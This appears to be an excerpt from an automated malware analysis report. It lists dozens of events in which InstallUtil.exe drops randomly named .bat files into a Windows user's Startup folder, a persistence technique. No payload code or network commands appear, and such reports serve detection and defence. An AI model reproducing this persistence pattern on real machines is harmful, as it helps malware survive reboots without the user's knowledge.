                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EnCs8E67uVG6Eqs33R0VMIaX.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JqwWbmZjvUESTxkLyujvgfQ5.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wvf29ezu4o4eQUDaEcLfHh2i.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gFEgarK2CmFukpJoHmXp7Y8A.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcqaETM5DR0YwESEQzBRnZKK.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4gvHRByQBP5m6HuFN5n1qeo.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3hhfUEZjih0hfMNE0tjXJNip.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IN4MpOFfotqkxFDb9xG1KgQ4.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zo8clGYvUOyWdFarhfpUgMEN.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fbij73WE0HqnGHEPJLXCBbDZ.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8pqQfoi3HoiRfRwXXSLOFIGm.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mQAC01IWkyy1VpnNHreKqDP9.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9uMffQzKGugRkIptYVRImTQz.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rxQ6BYkPciRzcYhkKHNbCVXz.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wWETG3CiojJKDjCsayXNSC4C.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X0SIO4n9RqqCJGm4W0OnxckQ.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xl8GqJiSNyzMP1kcdxSKb1Bh.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eJCDCqQnLPdN2iu0NZDfecsS.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\klA8JmAQ7d3aYJKSY8AQnRqN.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vM0i9O3SmyJMeySMU7pfuQYS.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4a9nVr9EEyQmaNt6aATX1FLT.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\o9mC5xW9tKlp4kRcY0ENXFVx.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QDBulKT4KjP0Dmav2rPCTbex.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NqyzZEihnfaWqCPw2h2kjWPD.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EXd58WGELkWeCynxgQPHUgBr.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\suhoeipyv9Q7WtMqEht6w8l1.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4FESHHshWvY8UVRNyfERDlM3.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nsezr6XoeqytkgoUxSHdidst.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A59bAABCemJp5R456KFjelzs.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OtXKtregFQf6WT1poKNUeJKH.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JvJ8FkMpNTNcNAQ5IZH9OyrC.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VnZF9b2NC7ruhyyJEaYXF7zf.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f8V9tkdL17zpTARbGXvubKh0.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aJ5ZzPIw4W4iDW4JiJvEgRVK.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MoodA9bUbe1XXFqshkJJ2aMi.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aG0yXFGDgm4eQ3ZK7Tgv4Q9D.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SfjQUmStVGetNiV041PzaRXb.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CuVU21KjVTi8Wd9l97IXHCaJ.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jPxMLAdrGIX6lhwANnPtfdmI.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lNPfzNqweDyCrBqs3aG9H3ld.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Raxl5XZrmvvadNCoiM9FLM1Y.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z2ZokpX7yw3dNDZbk7sMnpTY.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hDYTBIsUWgvU9DgjfmegeIG8.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dDOTNE5uA12l2ql1wlOLpcRF.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VA3T9NrhhZhF4wDb6Z4wF5ik.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jaUbcEKacTPqo4Q1E5vfMGYC.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZVr8x8v8WWDz7nLkoJBAPLpU.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DhFzVyJl1Qh3WRl61WvkIgtg.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5NnqgyNIFXV3fkGxjwFrvTVW.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n5FvfFJp0xTBHsTUd1HtVjgf.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OYIEdBWtHabBbSeILpT9tflf.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E5vcf50a1xrNZPss2hqKnW2D.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NRkNthlWHWKfvzr3Huo2Hk96.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aJ4M3BmSoFSfJVoorcfM8Tu.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aRQMhYcR0xLeNlVzNud4PjhM.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zu88srVplDcE4JudkCIsfMfK.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3bJmXHWxFTLdtjfcK2Eo1CEB.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XwXewTdG4i3reg1W4KZwDkqE.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3GBEpW1FZQUrWvbMjKRmSlSD.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LzSfFK21XHlma9f2nC93iWKZ.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mYqDdzubQoYo0UMqzcaWhlCq.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jeY2PypT42qBGgOqmE9VOHfI.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ocJg40zsLJKmhTN6I8MsqjRk.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HSU3kmKANUWIev2Y6XGUJn4z.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2qieftJz22U9uS3rPyIxFMCy.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ftO6ibAWBETsFr4PHO0HWyVm.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OqYgLbwNH1rp6de2WyF5QSu3.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uHMiBvdm9CkTFYr0icYjiahN.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T3nGwYe0ke53Bm81uF54Won2.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V38rH4DyBbWszXs0VbJ310hH.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaVgvfbmcMYFauF5SMIvBy7w.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L5wb8yM8aV9uA3MWk0nQDV6N.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mIcfPToLUPq3gj5WqJxRDBbR.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oEONzKus0KJmxBw4v3Njwzwg.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tOLiiaY6ffsKgwiVZfFcFIn0.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SQOPRbGOQslr1pMs9iyrT8Qb.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Oqdv9aQZnmchlZhQPGADj1vm.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wahfCAc9rxN7QFp93csP92wp.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hx0sIwDO9BmAGJHgVaGYhDQe.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oNjbvmMzdD4XPQKq54zqlNic.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4gvHRByQBP5m6HuFN5n1qeo.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3hhfUEZjih0hfMNE0tjXJNip.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IN4MpOFfotqkxFDb9xG1KgQ4.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wWETG3CiojJKDjCsayXNSC4C.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4a9nVr9EEyQmaNt6aATX1FLT.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nsezr6XoeqytkgoUxSHdidst.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A59bAABCemJp5R456KFjelzs.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aG0yXFGDgm4eQ3ZK7Tgv4Q9D.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SfjQUmStVGetNiV041PzaRXb.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CuVU21KjVTi8Wd9l97IXHCaJ.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z2ZokpX7yw3dNDZbk7sMnpTY.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hDYTBIsUWgvU9DgjfmegeIG8.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dDOTNE5uA12l2ql1wlOLpcRF.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZVr8x8v8WWDz7nLkoJBAPLpU.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5NnqgyNIFXV3fkGxjwFrvTVW.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DhFzVyJl1Qh3WRl61WvkIgtg.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uHMiBvdm9CkTFYr0icYjiahN.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaVgvfbmcMYFauF5SMIvBy7w.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oEONzKus0KJmxBw4v3Njwzwg.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V4vz7ooYcwTTy9p6mMfXbhaV.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V2Ua9TLWP47cusgrbbxD2ie8.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nnz2eQ1k1PBdAfnlioMuMIp1.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VFP6UagohjQssqJ93M7nVGAA.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\S8rXbw1cOVjTK1xkd0JIGo0q.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IZ5Y7BJc8EYdvXcnIuceiXSu.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EnCs8E67uVG6Eqs33R0VMIaX.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wvf29ezu4o4eQUDaEcLfHh2i.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcqaETM5DR0YwESEQzBRnZKK.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fbij73WE0HqnGHEPJLXCBbDZ.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9uMffQzKGugRkIptYVRImTQz.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X0SIO4n9RqqCJGm4W0OnxckQ.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xl8GqJiSNyzMP1kcdxSKb1Bh.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eJCDCqQnLPdN2iu0NZDfecsS.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NqyzZEihnfaWqCPw2h2kjWPD.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EXd58WGELkWeCynxgQPHUgBr.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4FESHHshWvY8UVRNyfERDlM3.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f8V9tkdL17zpTARbGXvubKh0.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MoodA9bUbe1XXFqshkJJ2aMi.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VnZF9b2NC7ruhyyJEaYXF7zf.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jPxMLAdrGIX6lhwANnPtfdmI.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lNPfzNqweDyCrBqs3aG9H3ld.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Raxl5XZrmvvadNCoiM9FLM1Y.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VA3T9NrhhZhF4wDb6Z4wF5ik.batJump to behavior
